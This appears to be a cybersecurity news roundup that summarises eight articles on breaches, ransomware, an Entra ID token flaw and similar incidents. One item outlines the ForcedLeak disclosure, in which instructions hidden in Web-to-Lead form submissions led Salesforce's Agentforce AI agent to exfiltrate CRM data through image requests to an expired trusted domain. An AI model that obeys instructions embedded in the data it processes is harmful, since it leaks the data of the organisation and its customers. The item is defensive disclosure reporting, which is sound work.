US Secret Service Dismantled Covert Communications Network Near the U.N. in New York

Article Link: https://securityaffairs.com/182499/intelligence/us-secret-service-dismantled-covert-communications-network-near-the-u-n-in-new-york.html

• The U.S. Secret Service uncovered a covert communications network near the United Nations Headquarters, seizing 100,000 SIM cards, 300 servers, illegal firearms, and other contraband. Capable of sending 30 million texts per minute, the network posed an imminent threat to senior officials.
• Investigators described the discovery as unprecedented in scale, warning it could enable mass outages, espionage, or tracking operations. Officials suspect potential nation-state involvement, given the cost and sophistication.
• Analysts noted links between seized SIMs and both foreign intelligence actors and organized crime groups, highlighting overlaps between espionage and cybercrime. Past cases, such as cartel-run telecom networks in Mexico, illustrate how illicit communication systems can be weaponized.
• The incident demonstrates the vulnerabilities of cellular infrastructure to hostile use. It also highlights the risks of advanced covert systems being deployed in sensitive areas, with cyber threats potentially becoming national security risks.

Inc Ransomware Group Claims 5.7 TB Theft from Pennsylvania Attorney General’s Office

Article Link: https://hackread.com/inc-ransomware-data-pennsylvania-attorney-general/

• The Inc ransomware group claimed responsibility for a breach at Pennsylvania’s Attorney General’s office in August 2025, alleging theft of 5.7 TB of sensitive data. Operations were disrupted, with trials delayed until mid-September, and while the office confirmed the attack, it refused to pay the ransom.
• Inc, active since 2023, uses phishing campaigns and software exploits to infiltrate networks. The group has attacked healthcare, retail, and government organizations, and its tactics typically combine data theft with system lockdowns for maximum leverage.
• Researcher Rebecca Moody of Comparitech notes this incident marks the 58th confirmed attack on U.S. government entities this year, and the 11th in August. The alleged 5.7 TB of data is the largest claimed against a U.S. government body in 2025.
• Moody predicts further public disclosures in coming weeks as investigations continue. With ransomware groups repeatedly targeting government bodies, she emphasizes the dual risks of widespread operational disruption and exposure of vast stores of sensitive personal data.

Boyd Gaming Discloses Data Breach After Suffering a Cyberattack

Article Link: https://www.bleepingcomputer.com/news/security/boyd-gaming-discloses-data-breach-after-suffering-a-cyberattack/

• Boyd Gaming Corporation, a major U.S. casino operator in ten states, disclosed a cyberattack in which threat actors stole employee and customer data. The 16,000-person company confirmed the breach in an SEC filing and stated it was working with external cybersecurity experts and law enforcement.
• Boyd said attackers exfiltrated data from its IT systems, including sensitive employee information. Impacted individuals and regulators are being notified, and the company expects its cybersecurity insurance to cover related costs.
• The company emphasized that its gaming operations were not affected and reported no material impact on financial performance. To date, no ransomware group has claimed responsibility, leaving questions about the attackers’ motives.
• The case highlights ongoing risks to the gaming and hospitality industry, where customer and employee data are prime targets. While Boyd’s operations remained intact, reputational and regulatory consequences often linger long after breaches are disclosed.

Microsoft Entra ID Flaw Allowed Hijacking Any Company’s Tenant

Article Link: https://www.bleepingcomputer.com/news/security/microsoft-entra-id-flaw-allowed-hijacking-any-companys-tenant/

• A critical flaw in Microsoft Entra ID, formerly Azure AD, could have allowed attackers to hijack tenants worldwide. Researcher Dirk-jan Mollema discovered undocumented “actor tokens,” which bypassed security controls, allowed full admin compromise, and impersonated any user.
• These unsigned tokens, issued by legacy services, were unrevokable for 24 hours and invisible to tenant logging. Attackers could generate these tokens in their own environments and reuse them against victim organizations by knowing publicly available tenant IDs and user identifiers.
• Microsoft acknowledged the issue, describing actor tokens as “high-privileged access” mechanisms used internally for service-to-service authentication. The company patched the Azure AD Graph API vulnerability assigned CVE-2025-55241 in early September, after Mollema’s disclosure in July, and confirmed plans to fully deprecate actor tokens.
• These design flaws highlight the risks of legacy components persisting in modern identity services. The vulnerability illustrates how attackers can exploit overlooked authentication mechanisms to gain stealthy access.

Qantas Cutting CEO Pay Signals New Era of Cyber Accountability

Article Link: https://www.csoonline.com/article/4062724/qantas-cutting-ceo-pay-signals-new-era-of-cyber-accountability.html

• Qantas Airways docked CEO Vanessa Hudson’s bonus by A$800,000 (US$522,000) following a June cyber incident exposing data on nearly 6 million passengers. Other executives were also penalized, marking one of the first public cases since Yahoo in 2017 where former CEO Marissa Mayer faced financial consequences for mishandling multiple breaches.
• Experts argue the decision reflects recognition that cybersecurity is not solely the CISO’s responsibility but extends to top leadership. Legal and regulatory frameworks increasingly expose CEOs to personal liability for oversight failures, with FTC, SEC, and EU rules expanding accountability.
• This trend suggests boards and investors expect more active engagement by CEOs in breach prevention and incident response. Some experts note that many C-suite consequences remain hidden, ranging from stalled promotions to early retirements, even without public disclosure.
• With cyber accountability now being reshaped, CISOs and CEOs are advised to build closer board partnerships, practice response plans, and integrate cyber oversight into governance structures.

Salesforce Patches Critical ForcedLeak Bug Exposing CRM Data via AI Prompt Injection

Article Link: https://thehackernews.com/2025/09/salesforce-patches-critical-forcedleak.html?m=1

• Noma Security researchers disclosed a vulnerability in Salesforce Agentforce, called ForcedLeak (CVSS score: 9.4), which allowed CRM data exfiltration. The flaw exploited Web-to-Lead forms via indirect prompt injection, tricking AI agents into executing malicious instructions hidden in submitted data.
• Attackers could leverage expired trusted domains to siphon data, including customer details and sales pipeline information. A proof-of-concept demonstrated exfiltration of sensitive information disguised within image requests, highlighting how AI agents’ expanded autonomy expands the attack surface.
• Salesforce patched the flaw in September 2025, enforcing Trusted URL allowlists for Agentforce and Einstein AI and re-securing the expired domain. Customers were advised to audit lead data, enforce strict input validation, and sanitize untrusted sources to prevent injection attacks.
• Experts stress that AI prompt injection is an emerging security frontier. As enterprises integrate autonomous AI into workflows, strong governance and proactive safeguards are required to prevent AI systems from becoming tools of data theft.

How One Bad Password Ended a 158-Year-Old Business

Article Link: https://thehackernews.com/2025/09/how-one-bad-password-ended-158-year-old.html?m=1

• UK-based KNP Logistics Group, operating for 158 years, collapsed in June 2025 after falling victim to the Akira ransomware group. Gaining entry by simply guessing an employee’s weak password on an internet-facing system without multi-factor authentication, attackers encrypted critical data, destroyed backups, and demanded £5 million, which the company could not pay.
• The attack left 500 trucks sidelined, 700 employees jobless, and the company in administration within weeks. Even with insurance and compliance programs, the firm had no recovery path once backups were wiped.
• Weak passwords remain a global plague, with a study from Kaspersky revealing nearly half of 193 million compromised credentials can be cracked in under a minute. KNP’s case illustrates how individual security lapses ripple across entire organizations, undermining all other defenses.
• Ransomware continues to devastate UK businesses, with an estimated 19,000 attacks last year alone. The article emphasizes a handful of security fundamentals bolster resilience, including implementing strong password practices, enabling MFA, implementing zero-trust architecture and least-privilege access controls, and performing regular backup and recovery.

Major Cyber Threat Detection Vendors Pull Out of MITRE Evaluations Test

Article Link: https://www.infosecurity-magazine.com/news/cyber-vendors-pull-out-mitre/

• Microsoft, SentinelOne, and Palo Alto Networks have all withdrawn from the 2025 MITRE ATT&CK Evaluations: Enterprise test. The move surprised many, given these vendors previously used results for marketing advantage, but each cited prioritizing innovation and customer needs.
• The annual evaluations simulate real-world attack techniques to benchmark detection and response. In 2025, scenarios include financially motivated intrusions and Chinese-aligned espionage campaigns. MITRE stresses the tests aren’t static but evolving assessments tailored yearly to adversary tactics.
• Critics argue the tests have become resource-intensive and drifted toward “vendor theater” used more for publicity than driving real security gains. MITRE acknowledged challenges, noting the increasing difficulty of evaluations and the lack of recent vendor forums to align expectations.
• Looking ahead, MITRE plans to re-establish the vendor forum in 2026 to improve collaboration and transparency. While some top vendors stepped away, others remain committed, ensuring the evaluations continue.